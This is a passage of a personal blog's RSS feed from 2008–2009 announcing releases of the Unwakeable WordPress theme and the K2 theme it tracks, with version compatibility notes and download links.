			<content:encoded><![CDATA[<p><a href="http://getk2.com/2009/07/k2-10-rc8-released/">K2 1.0-RC8</a> has been released.  It has support for threaded comments and <a href="http://code.google.com/p/kaytwo/wiki/K2ChildThemes">child themes</a>.  You can also edit the post meta without having to modify any code now.  A list of bug fixes can be <a href="http://code.google.com/p/kaytwo/issues/list?can=1&amp;q=RC8">found here</a>, and below is the full post from the K2 blog:</p>
<blockquote><p>This release adds support for Threaded Comments and <a href="http://code.google.com/p/kaytwo/wiki/K2ChildThemes">Child Themes</a>. Styles have been improved. You can specify where Styles are stored at, activate multiple styles, and edit them in the WordPress Theme Editor. You can also now customize the Post Meta (the line that reads <em>Published by John Doe&#8230;</em>) without having to edit any code.</p></blockquote>
<p><script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
I plan on building the next version of Unwakeable in the next couple weeks and will likely base it off of K2 1.0-RC8.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/_zV3drDzsWA2qJFuTwKSI_aaWKA/0/da"><img src="http://feedads.g.doubleclick.net/~a/_zV3drDzsWA2qJFuTwKSI_aaWKA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/_zV3drDzsWA2qJFuTwKSI_aaWKA/1/da"><img src="http://feedads.g.doubleclick.net/~a/_zV3drDzsWA2qJFuTwKSI_aaWKA/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=xr9UEdnLa4I:fbwxbJKs4qQ:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=xr9UEdnLa4I:fbwxbJKs4qQ:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=xr9UEdnLa4I:fbwxbJKs4qQ:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=xr9UEdnLa4I:fbwxbJKs4qQ:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=xr9UEdnLa4I:fbwxbJKs4qQ:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=xr9UEdnLa4I:fbwxbJKs4qQ:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=xr9UEdnLa4I:fbwxbJKs4qQ:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=xr9UEdnLa4I:fbwxbJKs4qQ:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=xr9UEdnLa4I:fbwxbJKs4qQ:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=xr9UEdnLa4I:fbwxbJKs4qQ:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/xr9UEdnLa4I" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/07/16/k2-1-0-rc8/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/07/16/k2-1-0-rc8/</feedburner:origLink></item>
		<item>
		<title>Unwakeable For WordPress 2.7.1</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/7IjeEeAGd5s/</link>
		<comments>http://www.longren.org/2009/03/28/unwakeable-for-wordpress-271/#comments</comments>
		<pubDate>Sat, 28 Mar 2009 16:49:49 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Unwakeable]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[k2]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wordpress-2.7]]></category>
		<category><![CDATA[wordpress-theme]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2424</guid>
		<description><![CDATA[I just uploaded a new version of Unwakeable, version 1.5.3 rc1.  This new version works with WordPress 2.7.1, unlike the previous version of Unwakeable.
Unwakeable 1.5.3 rc1 is up-to-date with K2 r776.  K2 no longer includes the K2 Sidebar Manager.  If you were using K2 Sidebar Modules and want to continue using it, [...]]]></description>
			<content:encoded><![CDATA[<p>I just uploaded a new version of <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable</a>, version 1.5.3 rc1.  This new version works with WordPress 2.7.1, unlike the previous version of Unwakeable.</p>
<p>Unwakeable 1.5.3 rc1 is up-to-date with <a href="http://code.google.com/p/kaytwo/source/detail?r=776">K2 r776</a>.  K2 no longer includes the <a href="http://getk2.com/2009/03/k2-sidebar-manager-removed/">K2 Sidebar Manager</a>.  If you were using K2 Sidebar Modules and want to continue using it, you can <a href="http://kaytwo.googlecode.com/files/k2-sbm.zip">download the plugin here</a>.<br />
<script type="text/javascript"><!--
google_ad_client = "pub-0816337812164133";
google_ui_features = "rc:0";
google_ad_width = 468;
google_ad_height = 60;
google_ad_format = "468x60_as";
google_ad_type = "";
google_alternate_ad_color = "";
google_color_border = "{{color-border}}";
google_color_bg = "{{color-bg}}";
google_color_link = "{{color-title}}";
google_color_text = "{{color-text}}";
google_color_url = "{{color-link}}";

//--></script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<br />
There&#8217;s a new option on the Unwakeable Options page that allows you to customize top and bottom meta information for each post.  The top meta information will be displayed directly under the title of a post.  The bottom meta information will be displayed at the end of the posts content.  You can use the following keywords to define what information you want to show: %author%, %categories%, %comments%, %date%, %tags% and %time%.</p>
<p>Have a look below to see what to enter in the top meta and bottom meta sections to display the same information that&#8217;s being displayed here.<br />
Top Meta: Published by %author% on %date% at %time% %comments%<br />
Bottom Meta: Categories: %categories% %tags%</p>
<p>You can download Unwakeable 1.5.3 rc1 from the <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable page</a>, or <a href="http://www.longren.org/downloads/unwakeable-1.5.3-rc1.zip">click here</a> to download it directly.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/LSr7RFPU3bjX7MVqWvIO6UZ5IHg/0/da"><img src="http://feedads.g.doubleclick.net/~a/LSr7RFPU3bjX7MVqWvIO6UZ5IHg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/LSr7RFPU3bjX7MVqWvIO6UZ5IHg/1/da"><img src="http://feedads.g.doubleclick.net/~a/LSr7RFPU3bjX7MVqWvIO6UZ5IHg/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=7IjeEeAGd5s:k9RvjwxQJWk:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=7IjeEeAGd5s:k9RvjwxQJWk:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=7IjeEeAGd5s:k9RvjwxQJWk:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=7IjeEeAGd5s:k9RvjwxQJWk:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=7IjeEeAGd5s:k9RvjwxQJWk:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=7IjeEeAGd5s:k9RvjwxQJWk:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=7IjeEeAGd5s:k9RvjwxQJWk:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=7IjeEeAGd5s:k9RvjwxQJWk:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=7IjeEeAGd5s:k9RvjwxQJWk:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=7IjeEeAGd5s:k9RvjwxQJWk:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/7IjeEeAGd5s" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2009/03/28/unwakeable-for-wordpress-271/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.longren.org/2009/03/28/unwakeable-for-wordpress-271/</feedburner:origLink></item>
		<item>
		<title>WordPress 2.7 and Unwakeable</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/E5qtlu3gRWc/</link>
		<comments>http://www.longren.org/2008/12/11/wordpress-27-and-unwakeable/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 05:48:25 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Unwakeable]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[k2]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wordpress-2.7]]></category>
		<category><![CDATA[wordpress-theme]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2400</guid>
		<description><![CDATA[WordPress 2.7 &#8220;Coltrane&#8221; is out.  The new dashboard is a nice change, it makes getting around much easier.  Here&#8217;s a bit from the release announcement:
The first thing you’ll notice about 2.7 is its new interface. From the top down, we’ve listened to your feedback and thought deeply about the design and the result [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://wordpress.org/development/2008/12/coltrane/">WordPress 2.7 &#8220;Coltrane&#8221;</a> is out.  The new dashboard is a nice change, it makes getting around much easier.  Here&#8217;s a bit from the <a href="http://wordpress.org/development/2008/12/coltrane/">release announcement</a>:</p>
<blockquote><p>The first thing you’ll notice about 2.7 is its new interface. From the top down, we’ve listened to your feedback and thought deeply about the design and the result is a WordPress that’s just plain faster. Nearly every task you do on your blog will <strong>take fewer clicks and be faster</strong> in 2.7 than it did in a previous version.</p></blockquote>
<p>The latest stable version of <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable</a>, 1.5.1, seems to work just fine with WordPress 2.7, from what I&#8217;ve seen anyway.  If you have any problems with Unwakeable 1.5.1 with WordPress 2.7, you may want to give <a href="http://www.longren.org/downloads/unwakeable-1.5.2-rc1.zip">Unwakeable 1.5.2 release candidate 1</a> a shot.  As of this post, it&#8217;s current with <a href="http://code.google.com/p/kaytwo/source/detail?r=739">K2 r739</a>.  Unwakeable 1.5.2 rc1 is currently running this site and appears to be very stable.  I hope to have Unwakeable ready for inclusion in the <a href="http://wordpress.org/extend/themes/">WordPress theme directory</a> by the time 1.5.2 is officially released.</p>
<p>If you have any problems with either of these versions of Unwakeable, please let me know by leaving at comment at the <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable page</a>.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/m7PYv6M--1Kl1x214_uIuCRCz9A/0/da"><img src="http://feedads.g.doubleclick.net/~a/m7PYv6M--1Kl1x214_uIuCRCz9A/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/m7PYv6M--1Kl1x214_uIuCRCz9A/1/da"><img src="http://feedads.g.doubleclick.net/~a/m7PYv6M--1Kl1x214_uIuCRCz9A/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=E5qtlu3gRWc:VUh5lYS-yIs:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=E5qtlu3gRWc:VUh5lYS-yIs:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=E5qtlu3gRWc:VUh5lYS-yIs:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=E5qtlu3gRWc:VUh5lYS-yIs:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=E5qtlu3gRWc:VUh5lYS-yIs:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=E5qtlu3gRWc:VUh5lYS-yIs:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=E5qtlu3gRWc:VUh5lYS-yIs:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=E5qtlu3gRWc:VUh5lYS-yIs:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=E5qtlu3gRWc:VUh5lYS-yIs:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=E5qtlu3gRWc:VUh5lYS-yIs:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/E5qtlu3gRWc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2008/12/11/wordpress-27-and-unwakeable/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://www.longren.org/2008/12/11/wordpress-27-and-unwakeable/</feedburner:origLink></item>
		<item>
		<title>WordPress Theme: Unwakeable 1.5.1</title>
		<link>http://feedproxy.google.com/~r/tlongren/~3/8r-QOSCU8JM/</link>
		<comments>http://www.longren.org/2008/07/29/wordpress-theme-unwakeable-151/#comments</comments>
		<pubDate>Tue, 29 Jul 2008 20:10:11 +0000</pubDate>
		<dc:creator>Tyler</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Noteworthy]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Unwakeable]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[k2]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[wordpress-theme]]></category>

		<guid isPermaLink="false">http://www.longren.org/?p=2375</guid>
		<description><![CDATA[Unwakeable 1.5.1 is available for download.  Version 1.5.1 works much better with WordPress 2.6.
The K2 Sidebar manager has been fixed to work with WordPress 2.6 via a plugin.  The plugin is a single file named k2-disable-widgets.php and is located in the app/includes folder in Unwakeable 1.5.1.  Simply copy that file to the [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable</a> 1.5.1 is available for download.  Version 1.5.1 works much better with WordPress 2.6.</p>
<p>The K2 Sidebar manager <a href="http://code.google.com/p/kaytwo/source/detail?r=701">has been fixed</a> to work with WordPress 2.6 via a plugin.  The plugin is a single file named k2-disable-widgets.php and is located in the app/includes folder in Unwakeable 1.5.1.  Simply copy that file to the wp-content/plugins folder and activate it as you would any other plugin.</p>
<p>Unwakeable 1.5.1 is up-to-date with <a href="http://code.google.com/p/kaytwo/source/detail?r=708">K2 revision 708</a>.  If you want to stay current with Unwakeable development, see <a href="http://code.google.com/p/unwakeable/source/list">the changes list</a>.  Head over to the <a href="http://www.longren.org/wordpress/unwakeable/">Unwakeable page</a> to download Unwakeable 1.5.1.</p>
<p><strong>UPDATE:</strong> If you&#8217;re using WordPress 2.6, you get a chance to preview a theme prior to making it active.  The theme preview for Unwakeable 1.5.1 is blank due to the periods in the folder name.  Even though the preview appears blank, Unwakeable will still work on your site just fine.  If you want to see the preview, just rename the unwakeable-1.5.1 folder to unwakeable151 or simply unwakeable.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/aoy1AVUf3GDgA7g1AsPJygblbz4/0/da"><img src="http://feedads.g.doubleclick.net/~a/aoy1AVUf3GDgA7g1AsPJygblbz4/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/aoy1AVUf3GDgA7g1AsPJygblbz4/1/da"><img src="http://feedads.g.doubleclick.net/~a/aoy1AVUf3GDgA7g1AsPJygblbz4/1/di" border="0" ismap="true"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/tlongren?a=8r-QOSCU8JM:S1wTWiank8k:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=8r-QOSCU8JM:S1wTWiank8k:wF9xT3WuBAs"><img src="http://feeds.feedburner.com/~ff/tlongren?i=8r-QOSCU8JM:S1wTWiank8k:wF9xT3WuBAs" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=8r-QOSCU8JM:S1wTWiank8k:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/tlongren?i=8r-QOSCU8JM:S1wTWiank8k:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=8r-QOSCU8JM:S1wTWiank8k:7Q72WNTAKBA"><img src="http://feeds.feedburner.com/~ff/tlongren?d=7Q72WNTAKBA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=8r-QOSCU8JM:S1wTWiank8k:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/tlongren?i=8r-QOSCU8JM:S1wTWiank8k:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/tlongren?a=8r-QOSCU8JM:S1wTWiank8k:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/tlongren?i=8r-QOSCU8JM:S1wTWiank8k:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/tlongren/~4/8r-QOSCU8JM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.longren.org/2008/07/29/wordpress-theme-unwakeable-151/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://www.longren.org/2008/07/29/wordpress-theme-unwakeable-151/</feedburner:origLink></item>
	</channel>
</rss><!-- Dynamic page generated in 3.454 seconds. --><!-- Cached page generated by WP-Super-Cache on 2010-03-09 18:45:42 -->
